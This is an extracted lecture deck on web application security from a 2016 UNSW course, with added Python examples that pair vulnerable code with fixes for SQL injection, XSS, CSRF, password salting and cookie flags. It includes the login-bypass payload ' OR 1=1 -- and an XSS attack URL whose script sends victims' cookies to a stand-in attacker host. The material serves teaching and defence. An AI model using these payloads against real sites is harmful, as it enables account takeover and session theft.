
COMP9321 Web Application Engineering, Semester 2, 2016

Dr. Amin Beheshti, Service Oriented Computing Group, CSE, UNSW Australia

Week 9

COMP9321, 16s2, Week 9

http://webapps.cse.unsw.edu.au/webcms2/course/index.php?cid=2445

Assignment 2

The due date for assignment 2 is the end of the mid-semester break: Sunday, 2 October 2016, 23:59:59.

Demo will be held during the lab times in week 10.

UNSW, CSE, Calendar: https://student.unsw.edu.au/calendar

Assignment 3


Released…

Introduction to Web Application Security


Acknowledgements

This presentation contains material prepared by Halvard Skogsrud, Senior Software Engineer, Thoughtworks, Inc. Sydney, Australia and from the Open Web Application Security Project (OWASP) http://www.owasp.org


Warning

The objective of this presentation is to show you common security loopholes appearing in Web applications. However, it is not meant to encourage you to attack web applications. Such actions are both a breach of the law in most countries, and of the CSE policy. Hence, by attempting any of the techniques presented in this lecture, you may be prosecuted by law enforcement and face expulsion from the university.

Securing your Web Application


Securing your Web Application: Threats!


Securing your Web Application: Requirements!


SQL Injection

SQL injection:

• is a code injection technique.
• is used to attack data-driven applications.
• How: malicious SQL statements are inserted into an entry field so that the application passes them to the database for execution.

SQL Injection: What is wrong?


Google(comment in sql)


SQL Injection: Summary!


SQL Injection: Prevention!!


To keep malicious inputs contained, any input that ends up inside an SQL statement must be encoded (escaped) for the SQL context it lands in. Better still, pass user input to the database as a bound parameter of a prepared statement, so the database never parses it as SQL at all; encoding is the fallback for the rare place where binding is impossible.

SQL encoding (escaping each special character): ' OR 1=1 --' is encoded to \ \'\ OR\ 1\=1\ \-\-'

https://en.wikipedia.org/wiki/Secure_input_and_output_handling
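Added worked example, not from the slides: the login functions below show the injection and both preventions against a constructed in-memory SQLite table. `login_vulnerable` concatenates the input into the query, so the username `' OR 1=1 --` turns the rest of the WHERE clause into a comment and logs the attacker in as the first user; `login_safe` binds the same input as a parameter of a prepared statement; `login_escaped` shows the encoding approach (quote doubling, which is standard SQL; the backslash form on the slide is the MySQL dialect). The table contents, user names and application code are assumptions for the demo.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table for the demo. Passwords are stored in
    clear only to keep the injection visible; a real store holds salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Query built by string concatenation: user input is parsed as SQL.
    With username = "' OR 1=1 --" the statement becomes
        ... WHERE username = '' OR 1=1 --' AND password = '...'
    so the password check is commented out and the first row matches."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Prepared statement with bound parameters: the driver hands the values
    to the database separately, so they are data and never SQL syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def sql_encode(value):
    """Encode a value for use inside a single-quoted SQL string literal.
    Standard SQL escapes a quote by doubling it. Only a fallback for the
    places where binding a parameter is impossible."""
    return value.replace("'", "''")


def login_escaped(conn, username, password):
    """Concatenation again, but with both inputs encoded first."""
    sql = ("SELECT username FROM users WHERE username = '" + sql_encode(username)
           + "' AND password = '" + sql_encode(password) + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


INJECTION = "' OR 1=1 --"   # classic authentication-bypass payload


def demo():
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, INJECTION, "wrong"),  # 'alice'
        "safe": login_safe(conn, INJECTION, "wrong"),              # None
        "escaped": login_escaped(conn, INJECTION, "wrong"),        # None
        "legit": login_safe(conn, "bob", "hunter2"),               # 'bob'
    }


if __name__ == "__main__":
    print(demo())
```

The same payload works against any query assembled by concatenation, whatever the language; the fix is to keep the query text constant and ship values through the driver's parameter binding.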


Cross Site Scripting (XSS)

Cross-site scripting (XSS):

• is a type of computer security vulnerability typically found in web applications.
• XSS enables attackers to inject client-side script into web pages viewed by other users.
• A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.
• Same-origin policy is an important concept in the web application security model.
• Under the policy, a web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin, e.g., a combination of URI scheme, hostname, and port number.

Cross Site Scripting (XSS): What is wrong?

Suppose the victim is given this URL by the attacker (www.badguy.com):

The web page would then be injected with the following script:

Cross Site Scripting (XSS): Summary!


Cross Site Scripting (XSS): Prevention!!


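Added worked example, not from the slides: a reflected XSS of the kind the "What is wrong?" slide describes, and the output encoding that prevents it. The attacker link is constructed here (the slide shows its URL only as an image); the application host is hypothetical, www.badguy.com is the attacker host named on the slide, and the injected script ships the victim's cookies there. `render_vulnerable` copies the search term into the page verbatim; `render_safe` and `render_safe_attribute` encode it for the HTML text and attribute contexts with Python's `html.escape`, so the browser displays the payload instead of executing it.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Constructed attacker link. Clicking it makes the victim's browser request the
# search page with the script as the search term.
ATTACK_URL = ("http://shop.example.test/search?q="
              "<script>location='http://www.badguy.com/steal?c='%2Bdocument.cookie</script>")


def query_param(url, name):
    """Extract one query parameter, as a servlet's getParameter() would."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get(name, [""])[0]


def render_vulnerable(term):
    """Reflects the search term into the page as raw HTML: the <script> in the
    term is parsed as markup and runs in the victim's session."""
    return f"<h1>Results for {term}</h1>"


def render_safe(term):
    """Output encoding for HTML text context: < > & " ' become entities, so
    the same term is shown as text and never executed."""
    return f"<h1>Results for {html.escape(term, quote=True)}</h1>"


def render_safe_attribute(term):
    """Attribute context: the value must be quoted AND escaped, otherwise a
    term such as  " onfocus="alert(1)  breaks out of the attribute."""
    return f'<input name="q" value="{html.escape(term, quote=True)}">'


def demo():
    term = query_param(ATTACK_URL, "q")
    return {
        "reflected_script_present": "<script>" in render_vulnerable(term),  # True
        "escaped_script_present": "<script>" in render_safe(term),          # False
        "escaped_output": render_safe(term),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The encoding has to match the context the data lands in (HTML text, attribute, JavaScript string, URL): one escaping routine does not cover all of them.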

Cross Site Request Forgery (CSRF)

Cross-site request forgery

• also known as a one-click attack or session riding
• abbreviated as CSRF or XSRF
• is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts

Exploit: a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software… Such behavior frequently includes things like gaining control of a computer system, allowing privilege escalation, or a denial-of-service attack.


Cross Site Request Forgery (CSRF): Prevention!!


A CAPTCHA is a type of challenge-response test used in computing to determine whether or not the user is human.
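Added worked example, not from the slides: the CSRF attack and the synchronizer-token defence (OWASP's primary recommendation, alongside the CAPTCHA mentioned above) on a constructed in-memory bank transfer endpoint. `transfer_vulnerable` trusts the session cookie alone, which the browser attaches to a POST auto-submitted from www.badguy.com; `transfer_safe` additionally requires the per-session token embedded in the legitimate form, which the attacker's page cannot read because of the same-origin policy. The session store, user names and form fields are assumptions for the demo.

```python
import hmac
import secrets

# Constructed in-memory session store (a real application keeps this in its
# session layer). Maps session id -> session data.
SESSIONS = {}


def login(user):
    """Create a session and a per-session CSRF token, both unguessable."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def transfer_form(sid):
    """Legitimate page served to the logged-in user: the token rides along as
    a hidden field. Script on www.badguy.com cannot read this document, so it
    cannot learn the token."""
    token = SESSIONS[sid]["csrf"]
    return ('<form method="POST" action="/transfer">'
            f'<input type="hidden" name="csrf_token" value="{token}">'
            '<input name="to"><input name="amount"><button>Send</button></form>')


def transfer_vulnerable(cookies, form):
    """Authenticates with the session cookie alone, so a request forged from
    another site (cookie attached automatically) is accepted."""
    session = SESSIONS.get(cookies.get("sid"))
    if session is None:
        return "unauthenticated"
    return f"{session['user']} sent {form['amount']} to {form['to']}"


def transfer_safe(cookies, form):
    """Synchronizer token check: the request must carry the token the server
    issued to this session. Constant-time comparison avoids timing leaks."""
    session = SESSIONS.get(cookies.get("sid"))
    if session is None:
        return "unauthenticated"
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted.encode(), session["csrf"].encode()):
        return "rejected: missing or wrong CSRF token"
    return f"{session['user']} sent {form['amount']} to {form['to']}"


# Constructed forged request: the fields www.badguy.com's hidden form submits.
# The attacker chooses these values but does not know the victim's token.
FORGED = {"to": "mallory", "amount": "1000"}


def demo():
    sid = login("alice")
    victim_cookies = {"sid": sid}          # attached by the victim's browser
    legitimate = dict(FORGED, csrf_token=SESSIONS[sid]["csrf"])
    return {
        "vulnerable_forged": transfer_vulnerable(victim_cookies, FORGED),
        "safe_forged": transfer_safe(victim_cookies, FORGED),
        "safe_legit": transfer_safe(victim_cookies, legitimate),
    }


if __name__ == "__main__":
    print(demo())
```

The token must be unpredictable and bound to the session; a token that is global, static or derivable from the session id gives no protection.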

Unvalidated Input


Unvalidated Input: Summary


Unvalidated Input: Prevention!


Broken Authentication



Google(SHA-1)

Fixing Authentication: How To?!


Google(MITM)

Fixing Authentication: Salting Passwords!

• In cryptography, a salt is random data that is used as an additional input to a one-way function that hashes a password or passphrase.

• The primary function of salts is to defend against dictionary attacks versus a list of password hashes and against pre-computed rainbow table attacks.

• e.g. the salt and the password can be concatenated and processed with a cryptographic hash function, and the resulting output (but not the original password) can be stored with the salt in a database.

Why add Salt?

If each password is simply hashed, identical passwords will have the same hash. There are two drawbacks:

1. Identical passwords give identical hashes, so one cracked hash unlocks every account that shares that password, and every guess can be checked against the whole list of hashes at once; the larger the database, the sooner the attacker finds a match (the slides relate this to the birthday paradox).

In probability theory, the birthday problem or birthday paradox concerns the probability that, in a set of n randomly chosen people, some pair of them will have the same birthday. See: http://en.wikipedia.org/wiki/Birthday_paradox

2. An attacker can use a list of precomputed hashes to break passwords in seconds.

A rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. See: http://en.wikipedia.org/wiki/Rainbow_table

In order to solve these problems, a salt can be concatenated to the password before the digest operation.

A salt is a random value of a fixed length. This salt must be different for each stored entry. It must be stored as clear text next to the hashed password.

In this configuration, an attacker must handle a brute force attack on each individual password. The database is now birthday attack/rainbow crack resistant.

Brute force attack:

• …consists of systematically checking all possible keys or passwords until the correct one is found.

• In the worst case, this would involve traversing the entire search space.
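Added worked example, not from the slides: the drawback and the fix above in code, on a constructed pair of users who chose the same password. `unsalted_hash` shows the identical digests the slide warns about; `hash_slide_style` is exactly the slide's scheme (salt concatenated with the password through one SHA-256); `hash_password` adds the caveat a practitioner wants on top of salting: a salt makes each password a separate brute-force job, but a single fast hash still lets an attacker try billions of guesses per second, so the stored hash should be a deliberately slow, iterated one (here PBKDF2-HMAC-SHA256 from the standard library; bcrypt, scrypt or Argon2 are the usual alternatives). The stored string carries the algorithm, iteration count and clear-text salt beside the digest, as the slide requires.

```python
import hashlib
import hmac
import os


def unsalted_hash(password):
    """What the slide warns against: identical passwords -> identical hashes."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def hash_slide_style(password, salt):
    """The slide's scheme: salt || password through one cryptographic hash.
    Defeats rainbow tables, but each guess costs only one SHA-256."""
    return hashlib.sha256(salt + password.encode("utf-8")).hexdigest()


def hash_password(password, salt=None, iterations=600_000):
    """Salted and deliberately slow: PBKDF2-HMAC-SHA256. Returns one string
    holding algorithm, iteration count, salt (clear text) and digest."""
    if salt is None:
        salt = os.urandom(16)    # fresh random salt for every stored entry
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time
    comparison so a wrong guess does not leak how many bytes matched."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format: " + algo)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


# Constructed sample: two users who happen to choose the same password.
USERS = {"alice": "Passw0rd!", "bob": "Passw0rd!"}


def demo(iterations=50_000):
    unsalted = {u: unsalted_hash(p) for u, p in USERS.items()}
    salted = {u: hash_password(p, iterations=iterations) for u, p in USERS.items()}
    return {
        "unsalted_collide": unsalted["alice"] == unsalted["bob"],      # True
        "salted_collide": salted["alice"] == salted["bob"],            # False
        "alice_ok": verify_password("Passw0rd!", salted["alice"]),     # True
        "alice_wrong": verify_password("passw0rd!", salted["alice"]),  # False
    }


if __name__ == "__main__":
    print(demo())
```

Because the iteration count is stored with each entry, it can be raised for new passwords as hardware gets faster without breaking verification of old ones.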


Session Management


Session Management: Problem or Solution?!


Set-Cookie: <name>=<value>[; Max-Age=<age>][; expires=<date>][; domain=<domain_name>][; path=<some_path>][; secure][; HttpOnly]

Max-Age and expires bound the cookie's lifetime; domain and path bound where the browser sends it; secure restricts it to HTTPS; HttpOnly hides it from client-side script, so a session ID is much harder to steal through XSS.
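Added worked example, not from the slides: generating an unpredictable session ID and emitting it with the Set-Cookie attributes listed above, plus a small audit function that parses a Set-Cookie line and reports which protections are missing. The example goes one attribute beyond the slide's list with SameSite, which keeps the browser from attaching the cookie to cross-site requests and so limits CSRF. The header builder, the audit rules and the weak sample header are this example's own, not a library API.

```python
import secrets


def new_session_id(nbytes=32):
    """Unpredictable session identifier: 32 bytes (256 bits) from the OS
    CSPRNG, URL-safe base64 encoded (43 characters)."""
    return secrets.token_urlsafe(nbytes)


def set_cookie_header(name, value, max_age=None, domain=None, path="/",
                      secure=True, http_only=True, same_site="Lax"):
    """Build a Set-Cookie line.
    Secure   : sent over HTTPS only
    HttpOnly : invisible to document.cookie (limits XSS cookie theft)
    SameSite : not attached to cross-site requests (limits CSRF)"""
    parts = [f"{name}={value}"]
    if max_age is not None:
        parts.append(f"Max-Age={int(max_age)}")
    if domain:
        parts.append(f"Domain={domain}")
    if path:
        parts.append(f"Path={path}")
    if secure:
        parts.append("Secure")
    if http_only:
        parts.append("HttpOnly")
    if same_site:
        parts.append(f"SameSite={same_site}")
    return "Set-Cookie: " + "; ".join(parts)


def audit_set_cookie(header):
    """Parse one Set-Cookie line and list the protections it lacks.
    Attribute names are case-insensitive, so compare in lower case."""
    body = header.split(":", 1)[1] if header.lower().startswith("set-cookie:") else header
    attributes = [p.strip() for p in body.split(";")[1:]]
    present = {a.split("=", 1)[0].strip().lower() for a in attributes}
    missing = []
    for flag, label in (("secure", "Secure"), ("httponly", "HttpOnly"), ("samesite", "SameSite")):
        if flag not in present:
            missing.append(label)
    return missing


# Constructed weak header: a session cookie issued with no protective flags.
WEAK_HEADER = "Set-Cookie: JSESSIONID=ABC123; Path=/"


if __name__ == "__main__":
    print(audit_set_cookie(WEAK_HEADER))                       # ['Secure', 'HttpOnly', 'SameSite']
    hardened = set_cookie_header("sid", new_session_id(), max_age=1800)
    print(hardened)
    print(audit_set_cookie(hardened))                          # []
```

A cookie flagged HttpOnly is still sent with every request the browser makes to the site, so it protects against theft of the ID, not against the CSRF case above; that is what SameSite and the CSRF token are for.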

Transport Layer Security


Transport Layer Security (e.g. HTTPS)


Google(Secure Sockets Layer, SSL)

Google(Certification Authority, CA)

HTTPS: Basics…


HTTPS: Public-Key Cryptography


HTTPS: Shared-Key Cryptography


HTTPS: Hashing


HTTPS: Certificates


HTTPS: Signatures


HTTPS: How to? … Limitations?!


How to?

• Follow the steps at: https://tomcat.apache.org/tomcat-6.0-doc/ssl-howto.html

Application Layer Security


References


• http://www.owasp.org
• https://tomcat.apache.org/tomcat-6.0-doc/ssl-howto.html
